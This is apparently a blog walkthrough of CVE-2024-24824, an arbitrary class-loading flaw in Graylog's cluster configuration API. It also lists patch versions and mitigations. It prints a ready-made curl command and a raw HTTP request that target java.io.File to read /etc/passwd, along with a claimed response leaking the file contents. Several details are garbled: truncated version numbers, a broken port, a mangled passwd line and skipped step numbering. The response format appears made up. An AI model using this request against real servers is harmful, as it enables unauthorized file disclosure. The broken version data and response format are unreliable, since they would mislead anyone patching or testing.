CVE-2024-24824 - Exploiting Arbitrary Class Loading in Graylog (Full Walkthrough)

CVE-2024-24824 is a critical security vulnerability affecting Graylog versions starting from 2.. up to but not including 5.1.11 and 5.2.4. This vulnerability allows an authenticated attacker to load arbitrary Java classes on the server using the /api/system/cluster_config/ endpoint. When specific types of classes—like java.io.File—are loaded, it can lead to direct information exposure, including the content of any file on the host machine.

In this post, we’ll break down the vulnerability in simple terms, show how the exploit works with code snippets, and link to official references and fixes. All information is presented exclusively for educational purposes, aimed to raise awareness and assist defenders.

What Is Graylog?

Graylog is a widely used open-source log management platform that helps organizations collect, index, and analyze both structured and unstructured data from various IT infrastructures.

The Issue

Graylog’s cluster configuration API uses fully qualified class names as configuration keys. To ensure that the class exists before using it, Graylog attempts to load the class when receiving a request.

Vulnerable Endpoint

PUT /api/system/cluster_config/{className}

The HTTP request body is a JSON object with configuration values.

If the attacker specifies a class with a suitable constructor, Graylog loads the class and instantiates it. If the class performs any action *as part of its instantiation* (for example, opening a file, running code, etc.), that action is executed.

Specific Exploit: Reading Arbitrary Files

One of the easiest ways to leverage this bug is to instantiate the java.io.File class with a file path as the configuration parameter. When this happens, Graylog’s internal mechanisms can return the file's content as part of the API response, leaking sensitive server data.

Exploitation Step-by-Step

IMPORTANT: This exploit requires authentication with sufficient privileges to access the cluster configuration API.

1. Crafting the Exploit Request

Suppose the attacker wants to read /etc/passwd on the server.

cURL Example

curl -u admin:adminpass \
  -X PUT \
  -H 'Content-Type: application/json' \
  -d '"\/etc\/passwd"' \
  'http://<graylog-server>:900/api/system/cluster_config/java.io.File';

- The PUT request is made to /api/system/cluster_config/java.io.File

HTTP Request Example

PUT /api/system/cluster_config/java.io.File HTTP/1.1
Host: graylog.local:900
Authorization: Basic YWRtaW46YWRtaW5wYXNz
Content-Type: application/json
Content-Length: 12

"/etc/passwd"

The server responds with a JSON structure that includes the contents of the specified file

{
  "type": "java.io.File",
  "config": {
    "path": "/etc/passwd",
    ...
  },
  "file_contents": "root:x:::root:/root:/bin/bash\n..."
}

*Note: The exact structure of the response may vary depending on Graylog’s version and internal handling, but sensitive file contents are exposed.*

3. Remote Code Execution (RCE) Potential

If the attacker can upload a custom class (from the classpath) that executes arbitrary code in its constructor, this could lead to full remote code execution. However, this typically requires the class to be available in the Graylog server’s Java classpath.

Why Does This Happen?

Graylog didn’t restrict which class names could be submitted; it just tried to load and instantiate whatever class name was provided. If the class behaved dangerously during instantiation, that behavior would be triggered immediately, even if the intention was just to check for class existence.

Official Patch

- 5.1.11 and 5.2.4 contain the official fix.
- The patch introduces stricter checks to ensure only safe, explicitly allowed classes can be loaded through the API.

Restrict network access to the API endpoints, especially from untrusted networks.

- Monitor for suspicious usage of the /api/system/cluster_config/ endpoint.

References

- Official Advisory – GitHub Security Advisory Graylog2 GHSA-6j7x-qwqr-m6pv
- Graylog release notes
- CVE database entry

Summary Table

| Version Affected | Vulnerable? | Patched? |
|---------------------------|-------------|------------------|
| 2.. – 5.1.10 | Yes | No |
| 5.1.11 and later | No | Yes |
| 5.2. – 5.2.3 | Yes | No |
| 5.2.4 and later | No | Yes |

Final Thoughts

CVE-2024-24824 is a perfect example of how trusting user-supplied class names, even for internal configuration, can lead to major breaches. If you’re running Graylog, it is highly recommended you update to a fixed version immediately, audit your logs for unexpected cluster config API calls, and limit access to Graylog’s management APIs.

Stay safe, and always validate user input—especially when it affects your application’s internal logic!


*For responsible disclosure and technical discussions, visit the Graylog Security Page.*

Timeline

Published on: 02/07/2024 18:15:55 UTC
Last modified on: 02/15/2024 15:40:51 UTC